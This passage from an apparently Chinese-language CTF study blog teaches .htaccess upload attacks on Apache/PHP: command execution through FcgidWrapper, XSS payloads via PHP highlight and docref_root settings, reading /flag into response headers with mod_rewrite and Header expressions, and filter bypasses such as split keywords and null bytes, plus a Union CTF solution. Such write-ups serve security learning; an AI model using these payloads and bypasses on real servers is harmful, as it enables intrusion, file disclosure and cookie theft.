<p><strong>新增指令</strong>：</p>
<ul>
<li><strong><code>FcgidWrapper</code></strong>：这是 <code>mod_fcgid</code> 特有的指令。它指定一个包装器程序（wrapper）来处理特定后缀的文件。<ul>
<li>语法：<code>FcgidWrapper &quot;包装器程序路径&quot; [文件后缀]</code></li>
<li>作用：对于匹配后缀的文件，Apache会调用指定的包装器程序来执行它们。</li>
<li>这里将 <code>cmd.exe /k start calc.exe</code> 设置为 <code>.xx</code> 文件的执行包装器，意味着任何对 <code>.xx</code> 文件的请求，都会启动计算器进程。</li>
</ul>
</li>
</ul>
<p>执行流程</p>
<ol>
<li>攻击者上传 <code>.htaccess</code> 和任意 <code>.xx</code> 文件（内容可空白）。</li>
<li>访问 <code>ce.xx</code>。</li>
<li><code>mod_fcgid</code> 接管请求，根据 <code>FcgidWrapper</code> 指令，调用 <code>cmd.exe</code> 启动计算器。</li>
<li><strong>与CGI的区别</strong>：FastCGI可能会维持一个进程池，但这里因为包装器每次都启动新进程，效果与传统CGI类似。</li>
</ol>
<h4 id="⑤xss"><a href="#⑤xss" class="headerlink" title="⑤xss"></a>⑤xss</h4><p>highlight_file：</p>
<p>前提条件：php文件中存在<code>highlight_file(__FILE__);</code></p>
<p>.htaccess配置文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">php_value highlight.comment &#x27;&quot;&gt;&lt;script&gt;alert(1);&lt;/script&gt;&#x27;<br></code></pre></td></tr></table></figure>

<p><strong>指令作用</strong>：</p>
<ul>
<li><strong><code>highlight.comment</code></strong>：这是PHP的语法高亮配置选项之一，用于定义<strong>注释</strong>在HTML输出时的样式。</li>
<li>默认情况下，它的值是类似 <code>style=&quot;color: #FF8000&quot;</code> 的HTML属性字符串。</li>
<li>攻击者将其改为 <code>&#39;&quot;&gt;&lt;script&gt;alert(1);&lt;/script&gt;&#39;</code>，这是一个<strong>HTML注入</strong> payload。</li>
</ul>
<p>其中的 <code>highlight.comment</code> 也可以换成其他选项比如，</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20260313140241141.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20260313140241141.png" alt="image-20260313140241141" style="zoom:80%;" />

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">highlight.string	字符串颜色	#DD0000<br>highlight.comment	注释颜色	#FF8000<br>highlight.keyword	关键字颜色	#007700<br>highlight.default	默认文本颜色	#0000BB<br>highlight.html	HTML代码颜色	#000000<br></code></pre></td></tr></table></figure>

<p>示例：</p>
<p>index.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&lt;?php<br>highlight_file(__FILE__);<br>// comment<br></code></pre></td></tr></table></figure>

<p><strong>流程及其效果</strong></p>
<ol>
<li><p>用户访问 <code>index.php</code>。</p>
</li>
<li><p>PHP执行 <code>highlight_file(__FILE__);</code>，读取 <code>index.php</code> 自身的源代码。</p>
</li>
<li><p>PHP对源代码进行语法高亮处理，为不同元素（关键字、字符串、注释等）添加HTML <code>&lt;span&gt;</code> 标签和样式。</p>
</li>
<li><p>在处理注释 <code>// comment</code> 时，PHP使用 <code>highlight.comment</code> 配置的值作为样式属性。</p>
</li>
<li><p>最终生成的HTML代码中会出现类似：</p>
<p>html</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&lt;span style=&quot;&#x27;&gt;&lt;script&gt;alert(1);&lt;/script&gt;&quot;&gt;// comment&lt;/span&gt;<br></code></pre></td></tr></table></figure>
</li>
<li><p>浏览器解析HTML时，<code>&lt;script&gt;alert(1);&lt;/script&gt;</code> 被当作JavaScript执行，弹窗。</p>
</li>
</ol>
<h4 id="利用错误消息链接实现-XSS"><a href="#利用错误消息链接实现-XSS" class="headerlink" title="利用错误消息链接实现 XSS"></a>利用错误消息链接实现 XSS</h4><p>前提条件</p>
<p>目录下有一个PHP文件，会触发错误（例如包含一个不存在的文件）。</p>
<p> index.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&lt;?php<br>include(&#x27;foo&#x27;);  // foo文件不存在，会报错<br>?&gt;<br></code></pre></td></tr></table></figure>

<p>.htaccess 配置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">php_flag display_errors 1<br>php_flag html_errors 1<br>php_value docref_root &quot;&#x27;&gt;&lt;script&gt;alert(1);&lt;/script&gt;&quot;<br></code></pre></td></tr></table></figure>

<p><strong>指令详解</strong>：</p>
<ul>
<li><strong><code>php_flag display_errors 1</code></strong>：开启错误显示，让错误信息输出到浏览器。</li>
<li><strong><code>php_flag html_errors 1</code></strong>：以HTML格式显示错误信息，使错误信息中包含链接。</li>
<li><strong><code>php_value docref_root &quot;&#39;&gt;&lt;script&gt;alert(1);&lt;/script&gt;&quot;</code></strong>：设置错误消息中“参考文档”链接的根URL。当 <code>html_errors</code> 开启时，PHP会在错误信息中生成一个指向文档的链接，链接地址由 <code>docref_root</code> 和错误类型组成。</li>
</ul>
<p>流程及最终效果：</p>
<ol>
<li><p>用户访问 <code>index.php</code>。</p>
</li>
<li><p>PHP尝试包含 <code>foo</code> 文件，但文件不存在，触发警告或错误。</p>
</li>
<li><p>由于 <code>display_errors</code> 和 <code>html_errors</code> 开启，PHP生成HTML格式的错误信息。</p>
</li>
<li><p>在错误信息中，PHP会包含一个“参考文档”链接，链接的href属性值由 <code>docref_root</code> 决定。</p>
</li>
<li><p>攻击者设置的 <code>docref_root</code> 值为 <code>&#39;&quot;&gt;&lt;script&gt;alert(1);&lt;/script&gt;</code>，因此生成的HTML代码为：</p>
<p>html</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&lt;a href=&quot;&#x27;&gt;&lt;script&gt;alert(1);&lt;/script&gt;...&quot;&gt;...&lt;/a&gt;<br></code></pre></td></tr></table></figure>
</li>
<li><p>浏览器解析时，<code>&lt;script&gt;</code> 标签被执行。</p>
</li>
</ol>
<p>这里可以做到窃取cookie，配合CSRF进行脚本执行恶意操作。</p>
<h4 id="⑥利用重写模块读取文件内容"><a href="#⑥利用重写模块读取文件内容" class="headerlink" title="⑥利用重写模块读取文件内容"></a>⑥利用重写模块读取文件内容</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">RewriteEngine On<br>RewriteCond expr &quot;file(&#x27;/flag&#x27;) =~ /(.+)/&quot;<br>RewriteRule .* - [E=FLAG_CONTENT:%1]<br>Header set X-Test-Expr &quot;%&#123;FLAG_CONTENT&#125;e&quot;<br></code></pre></td></tr></table></figure>

<p><strong>上传 <code>.htaccess</code></strong> 作为攻击入口（突破上传限制）。</p>
<p>利用 <strong><code>mod_rewrite</code> + <code>expr</code> + <code>file()</code></strong> 读取服务器上的flag文件。</p>
<p>利用 <strong><code>mod_headers</code></strong> 将读取到的内容写入<strong>响应头</strong>。</p>
<p><strong>访问任意文件</strong> 触发重写规则，从而获取flag。</p>
<p><strong>核心利用点：</strong></p>
<ul>
<li><strong><code>RewriteCond expr</code>：</strong> 在重写条件中使用<strong>表达式（expr）解析器</strong>。表达式可以调用Apache的内部函数，例如 <code>file(&#39;/flag&#39;)</code>。</li>
<li><strong><code>file()</code> 函数：</strong> 在Apache的expr上下文中，<code>file(&#39;/flag&#39;)</code> 用于读取服务器上的文件（这里是根目录下的flag文件）。这是本题实现文件读取的关键。</li>
<li><strong>正则捕获：</strong> 通过 <code>=~ /(.+)/</code> 将读取的文件内容匹配并捕获到变量 <code>%1</code> 中。</li>
<li><strong><code>mod_headers</code></strong>：由于无法直接将文件内容打印到页面上（且PHP被禁用），攻击者将捕获到的flag内容（<code>%&#123;FLAG_CONTENT&#125;e</code>）写入自定义的响应头 <code>X-Test-Expr</code> 中。当客户端访问该目录下的任意文件时，flag就会以响应头的形式返回给攻击者。</li>
<li><code>RewriteRule .* - [E=FLAG_CONTENT:%1]</code> 中的 <code>[E=]</code> 标志用于设置环境变量。将正则捕获到的flag内容（<code>%1</code>）赋值给环境变量 <code>FLAG_CONTENT</code>。随后，<code>Header</code> 指令通过 <code>%&#123;FLAG_CONTENT&#125;e</code> 语法读取这个环境变量，实现了重写模块到头模块的数据传递。</li>
</ul>
<h4 id="⑦利用不存在的文件，触发header头带出"><a href="#⑦利用不存在的文件，触发header头带出" class="headerlink" title="⑦利用不存在的文件，触发header头带出"></a>⑦利用不存在的文件，触发header头带出</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">Options +Indexes<br>DirectoryIndex /123.txt<br>Header set X-Flag &quot;expr=%&#123;file:/flag&#125;&quot;<br></code></pre></td></tr></table></figure>

<p>这个只需要上传一个文件即可。最后访问目录本身。</p>
<h3 id="四-Bypass"><a href="#四-Bypass" class="headerlink" title="四.Bypass"></a>四.Bypass</h3><h4 id="第一类：绕过内容检测（改动的是文件内容）"><a href="#第一类：绕过内容检测（改动的是文件内容）" class="headerlink" title="第一类：绕过内容检测（改动的是文件内容）"></a>第一类：绕过内容检测（改动的是文件内容）</h4><p>这类方法适用于：服务器检查了上传文件的内容，发现了黑名单关键词（如 <code>AddType</code>、<code>php_value</code>）就拦截。我们通过改变文件内容的写法，让这些关键词不被识别出来，但Apache在解析时仍能正确执行。</p>
<h5 id="1-注释符与拼接绕过"><a href="#1-注释符与拼接绕过" class="headerlink" title="1. 注释符与拼接绕过"></a>1. 注释符与拼接绕过</h5><ul>
<li><p><strong>原理解析</strong>：Apache解析 <code>.htaccess</code> 时，支持两种语法：</p>
<ol>
<li><code>#</code> 作为注释符，它后面的内容会被忽略。我们可以利用这一点，在敏感指令后加上 <code>#</code> ，来绕过WAF。</li>
<li><code>\</code> 可以拼接上下两行，这可以用来拆分敏感关键词。</li>
</ol>
</li>
<li><p><strong>利用方式</strong>举例：</p>
<ul>
<li><p><strong>内容拆分</strong>：将 <code>AddType</code> 拆成 <code>AddT</code> 和 <code>ype</code> 分两行写。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext"># 文件内容<br>AddT\<br>ype application/x-httpd-php .jpg<br></code></pre></td></tr></table></figure>

<p>WAF如果只做简单的关键词匹配，可能只看到第一行的 <code>AddT</code> 和第二行的 <code>ype</code>，无法识别出完整的 <code>AddType</code>。但Apache在解析时，会把这两行合并成一条完整指令执行。</p>
</li>
<li><p><strong>内容混淆</strong>：在有效指令后面加上 <code>#</code> </p>
<p><code>#</code>需要和前面的内容隔一个空格，并且<code>#</code>只能注释一行内容，可以使用反斜线来转义换行符，从而注释多行内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plaintext"># 文件内容<br>AddType application/x-httpd-php .jpg #<br>abdsad<br>sadad<br></code></pre></td></tr></table></figure></li>
</ul>
</li>
</ul>
<h5 id="2-空字节注释绕过"><a href="#2-空字节注释绕过" class="headerlink" title="2. 空字节注释绕过"></a>2. 空字节注释绕过</h5><ul>
<li><p><strong>原理解析</strong>：在早期的Apache版本或某些特定配置下，空字节（<code>0x00</code>）在配置文件中也可能被当作注释符或截断符。其后的内容会被忽略。</p>
</li>
<li><p><strong>利用方式</strong>：<br>在文件内容中插入空字节。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&lt;?php<br>$data = urldecode(&#x27;AddType application/x-httpd-php .abc%0a%00asdf&#x27;);<br>file_put_contents(&#x27;.htaccess&#x27;, $data);<br></code></pre></td></tr></table></figure></li>
</ul>
<hr>
<h4 id="第二类：绕过文件名检测（改动的是文件名）"><a href="#第二类：绕过文件名检测（改动的是文件名）" class="headerlink" title="第二类：绕过文件名检测（改动的是文件名）"></a>第二类：绕过文件名检测（改动的是文件名）</h4><p>这类方法适用于：服务器检查了上传文件的<strong>文件名</strong>，明确禁止上传文件名为 <code>.htaccess</code> 的文件。</p>
<h5 id="1-文件名大小写-变形"><a href="#1-文件名大小写-变形" class="headerlink" title="1. 文件名大小写&#x2F;变形"></a>1. 文件名大小写&#x2F;变形</h5><ul>
<li><strong>改动对象</strong>：<strong>文件名</strong>。</li>
<li><strong>原理解析</strong>：服务器对文件名的检测规则是死的，但不同操作系统和Web服务器对文件名的处理方式存在差异。</li>
<li><strong>利用方式</strong>：<ul>
<li><strong>大小写绕过</strong>：尝试上传文件名如 <strong><code>.HTACCESS</code></strong>、<strong><code>.Htaccess</code></strong>。<ul>
<li><strong>场景A</strong>：服务器运行在 <strong>Windows</strong> 上。Windows的文件系统（如NTFS）默认是<strong>不区分大小写</strong>的。所以，当你上传 <code>.HTACCESS</code> 文件后，在Windows系统中，它就是 <code>.htaccess</code>。Apache会正确地把它当作配置文件加载。</li>
<li><strong>场景B</strong>：服务器运行在 <strong>Linux</strong> 上。Linux的文件系统（如ext4）是<strong>区分大小写</strong>的。如果只禁止了 <code>.htaccess</code>，那么上传 <code>.HTACCESS</code> 后，系统里会存在一个名为 <code>.HTACCESS</code> 的文件，而Apache默认只加载文件名<strong>精确为</strong> <code>.htaccess</code> 的文件。所以，这种方法在Linux上通常会失败。除非Apache的配置被修改为加载更多文件名。</li>
</ul>
</li>
<li><strong>后缀&#x2F;前缀变形</strong>：尝试上传文件名如 <strong><code>.htaccess.txt</code></strong>、<strong><code>shell.htaccess</code></strong>。<ul>
<li>这利用了服务器可能只检查文件名的<strong>开头或结尾</strong>，或者检查得不够严格。如果上传目录的配置允许，且Apache能够识别 <code>.htaccess.txt</code> 或 <code>shell.htaccess</code> 为有效的配置文件，那么它也可能生效。但这取决于Apache的主配置（<code>AccessFileName</code> 指令）是否定义了这些备用文件名。默认情况下，Apache只认 <code>.htaccess</code>。</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="例题：Union-Ctf-ezupload"><a href="#例题：Union-Ctf-ezupload" class="headerlink" title="例题：Union Ctf ezupload"></a>例题：Union Ctf ezupload</h2><p>解法一：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">RewriteEngine On<br>RewriteCond expr &quot;file(&#x27;/flag&#x27;) =~ /(.+)/&quot;<br>RewriteRule .* - [E=FLAG_CONTENT:%1]<br>Header set X-Test-Expr &quot;%&#123;FLAG_CONTENT&#125;e&quot;<br></code></pre></td></tr></table></figure class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20260313143334443.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20260313143334443.png" alt="image-20260313143334443" style="zoom:80%;" />

<img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20260313143439240.png" alt="image-20260313143439240" style="zoom:80%;" / class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20260313143439240.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20260313143439240.png" alt="image-20260313143439240" style="zoom:80%;" />

<p>解法二：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">Options +Indexes<br>DirectoryIndex /123.txt<br>Header set X-Flag &quot;expr=%&#123;file:/flag&#125;&quot;<br></code></pre></td></tr></table></figure class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20260313143237807.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20260313143237807.png" alt="image-20260313143237807" style="zoom:80%;" />

<img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20260313143223551.png" alt="image-20260313143223551" style="zoom:80%;" /><div id="paginator"></div></div><div id="post-footer"><div id="pages" style="justify-content: flex-end"><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2026/02/14/%E9%82%A3%E4%BA%9B%E6%AF%94%E8%BE%83%E7%9A%84%E7%BB%95%E8%BF%87(php%E7%89%B9%E6%80%A7)/">那些比较的绕过（php特性） Prev →</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" href="#toc-div" title="To Catalog">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="Change Theme"></a><a onclick="BgmControl()"><svg id="bgm-control" viewBox="0 0 30 34" fill="#18d1ff" style="width: 24px; transition: transform .3s;margin-top: 4px"><path d="M25.998 23.422V11.29h3.999v12.132h-3.999zM19.497 6.234h4.001v22.243h-4.001V6.234zM12.998.867h4v32.978h-4V.867zm-6.5 5.367h4.001v22.243H6.498V6.234zm-6.5 5.056h4v12.132h-4V11.29z"></path></svg><audio id="bgm" src="/audio/bgm1.mp3" autoplay loop crossorigin="anonymous"> </audio></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://media.prts.wiki/c/cc/%E5%A4%B4%E5%83%8F_%E8%89%BE%E9%9B%85%E6%B3%95%E6%8B%89.png" alt="Logo" style="margin:0;border-radius:0;"></a><h1 id="Dr"><a href="/">wOyOm</a></h1><div id="description"><p>记录web学习</p></div></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0-htaccess%E6%96%87%E4%BB%B6%E7%AF%87"><span class="toc-number">1.</span> <span class="toc-text">文件上传 .htaccess文件篇</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80-htaccess%E6%96%87%E4%BB%B6%E6%98%AF%E4%BB%80%E4%B9%88"><span class="toc-number">1.1.</span> <span class="toc-text">一. .htaccess文件是什么</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BA%8C-%E5%B8%B8%E8%A7%81%E6%8C%87%E4%BB%A4"><span class="toc-number">1.2.</span> <span class="toc-text">二.常见指令</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%91%A0SetHandler%EF%BC%88%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E6%9F%A5%E7%9C%8B%E8%87%AA%E5%B7%B1payload%E7%9A%84%E8%A7%A6%E5%8F%91%E6%83%85%E5%86%B5%EF%BC%89"><span class="toc-number">1.2.1.</span> <span class="toc-text">①SetHandler（信息收集查看自己payload的触发情况）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%91%A1AddType%EF%BC%88%E5%B0%86%E5%9B%BE%E7%89%87%E5%BD%93%E4%BD%9Cphp%E8%BF%90%E8%A1%8C%EF%BC%89"><span class="toc-number">1.2.2.</span> <span class="toc-text">②AddType（将图片当作php运行）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%91%A2AddHandler-%EF%BC%88cgi%E8%84%9A%E6%9C%AC%E6%89%A7%E8%A1%8C%EF%BC%89"><span class="toc-number">1.2.3.</span> <span class="toc-text">③AddHandler （cgi脚本执行）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%91%A3php-value-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%EF%BC%88%E8%87%AA%E5%8A%A8%E5%8C%85%E5%90%AB%EF%BC%89%E5%8F%8A%E6%AD%A3%E5%88%99%E7%BB%95%E8%BF%87"><span class="toc-number">1.2.4.</span> <span class="toc-text">④php_value 文件上传（自动包含）及正则绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%91%A4php-flag-engine-0-%E8%8E%B7%E5%8F%96%E6%BA%90%E7%A0%81%EF%BC%88%E6%B2%A1%E5%95%A5%E7%94%A8-%EF%BC%89%E5%85%B6%E5%AE%9E%E5%92%8C%E4%BD%A0%E9%BC%A0%E6%A0%87%E5%8F%B3%E9%94%AE%E4%B8%80%E6%A0%B7"><span class="toc-number">1.2.5.</span> <span class="toc-text">⑤php_flag engine 0 获取源码（没啥用 ）其实和你鼠标右键一样</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%91%A5%E4%B8%80%E4%BA%9B%E5%85%B6%E4%BB%96%E7%9A%84%E6%96%B9%E6%B3%95%E5%92%8C%E4%BB%96%E4%BB%AC%E7%9A%84%E5%88%A9%E7%94%A8%E5%9C%BA%E6%99%AF%EF%BC%9ADirectoryIndex"><span class="toc-number">1.2.6.</span> <span class="toc-text">⑥一些其他的方法和他们的利用场景：DirectoryIndex</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%91%A6%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E5%92%8C%E5%8A%9F%E8%83%BD%E9%85%8D%E7%BD%AEOptions-Indexes"><span class="toc-number">1.2.7.</span> <span class="toc-text">⑦访问控制和功能配置Options +Indexes</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%91%A7RewriteEngine-%E4%B8%8E-RewriteRule"><span class="toc-number">1.2.8.</span> <span class="toc-text">⑧RewriteEngine 与 RewriteRule</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%91%A8Header-%E6%8C%87%E4%BB%A4"><span class="toc-number">1.2.9.</span> <span class="toc-text">⑨Header 指令</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%89-%E5%85%B7%E4%BD%93%E5%9C%BA%E6%99%AF%E5%8F%8A%E5%85%B6%E7%BB%84%E5%90%88%E5%88%A9%E7%94%A8%E6%96%B9%E5%BC%8F"><span class="toc-number">1.3.</span> <span class="toc-text">三.具体场景及其组合利用方式</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%91%A0%E6%96%87%E4%BB%B6%E8%A7%A3%E6%9E%90"><span class="toc-number">1.3.1.</span> <span class="toc-text">①文件解析</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%91%A1%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%EF%BC%8C%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB-LFI-%E4%B8%8E%E6%95%8F%E6%84%9F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96"><span class="toc-number">1.3.2.</span> <span class="toc-text">②文件包含，本地文件包含 (LFI) 与敏感文件读取</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">1.3.2.1.</span> <span class="toc-text">本地文件包含</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">1.3.2.2.</span> <span class="toc-text">远程文件包含</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%91%A2%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C"><span class="toc-number">1.3.3.</span> <span class="toc-text">③代码执行</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-%E4%BC%AA%E5%8D%8F%E8%AE%AE"><span class="toc-number">1.3.3.1.</span> <span class="toc-text">1.伪协议</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2-%E8%A7%A3%E6%9E%90-htaccess"><span class="toc-number">1.3.3.2.</span> <span class="toc-text">2.解析.htaccess</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%91%A3%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%EF%BC%88%E8%BF%99%E4%B8%AA%E6%96%B9%E6%B3%95%E5%BE%88%E5%B0%91%E8%A7%81%EF%BC%8C%E8%AF%95%E9%AA%8C%E4%BA%86%E5%87%A0%E4%B8%AA%E9%A2%98%E7%9B%AE%E9%9D%B6%E5%9C%BA%E5%9F%BA%E6%9C%AC%E6%B2%A1%E6%9C%89mod-cgi-%E6%A8%A1%E5%9D%97%EF%BC%8C%E4%BB%85%E4%BD%9C%E4%BA%86%E8%A7%A3%EF%BC%89"><span class="toc-number">1.3.4.</span> <span class="toc-text">④命令执行（这个方法很少见，试验了几个题目靶场基本没有mod_cgi 模块，仅作了解）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%91%A4xss"><span class="toc-number">1.3.5.</span> <span class="toc-text">⑤xss</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E9%94%99%E8%AF%AF%E6%B6%88%E6%81%AF%E9%93%BE%E6%8E%A5%E5%AE%9E%E7%8E%B0-XSS"><span class="toc-number">1.3.6.</span> <span class="toc-text">利用错误消息链接实现 XSS</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%91%A5%E5%88%A9%E7%94%A8%E9%87%8D%E5%86%99%E6%A8%A1%E5%9D%97%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E5%86%85%E5%AE%B9"><span class="toc-number">1.3.7.</span> <span class="toc-text">⑥利用重写模块读取文件内容</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%91%A6%E5%88%A9%E7%94%A8%E4%B8%8D%E5%AD%98%E5%9C%A8%E7%9A%84%E6%96%87%E4%BB%B6%EF%BC%8C%E8%A7%A6%E5%8F%91header%E5%A4%B4%E5%B8%A6%E5%87%BA"><span class="toc-number">1.3.8.</span> <span class="toc-text">⑦利用不存在的文件，触发header头带出</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9B%9B-Bypass"><span class="toc-number">1.4.</span> <span class="toc-text">四.Bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC%E4%B8%80%E7%B1%BB%EF%BC%9A%E7%BB%95%E8%BF%87%E5%86%85%E5%AE%B9%E6%A3%80%E6%B5%8B%EF%BC%88%E6%94%B9%E5%8A%A8%E7%9A%84%E6%98%AF%E6%96%87%E4%BB%B6%E5%86%85%E5%AE%B9%EF%BC%89"><span class="toc-number">1.4.1.</span> <span class="toc-text">第一类：绕过内容检测（改动的是文件内容）</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-%E6%B3%A8%E9%87%8A%E7%AC%A6%E4%B8%8E%E6%8B%BC%E6%8E%A5%E7%BB%95%E8%BF%87"><span class="toc-number">1.4.1.1.</span> <span class="toc-text">1. 注释符与拼接绕过</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2-%E7%A9%BA%E5%AD%97%E8%8A%82%E6%B3%A8%E9%87%8A%E7%BB%95%E8%BF%87"><span class="toc-number">1.4.1.2.</span> <span class="toc-text">2. 空字节注释绕过</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC%E4%BA%8C%E7%B1%BB%EF%BC%9A%E7%BB%95%E8%BF%87%E6%96%87%E4%BB%B6%E5%90%8D%E6%A3%80%E6%B5%8B%EF%BC%88%E6%94%B9%E5%8A%A8%E7%9A%84%E6%98%AF%E6%96%87%E4%BB%B6%E5%90%8D%EF%BC%89"><span class="toc-number">1.4.2.</span> <span class="toc-text">第二类：绕过文件名检测（改动的是文件名）</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-%E6%96%87%E4%BB%B6%E5%90%8D%E5%A4%A7%E5%B0%8F%E5%86%99-%E5%8F%98%E5%BD%A2"><span class="toc-number">1.4.2.1.</span> <span class="toc-text">1. 文件名大小写&#x2F;变形</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98%EF%BC%9AUnion-Ctf-ezupload"><span class="toc-number">2.</span> <span class="toc-text">例题：Union Ctf ezupload</span></a></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> by <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas></body></html>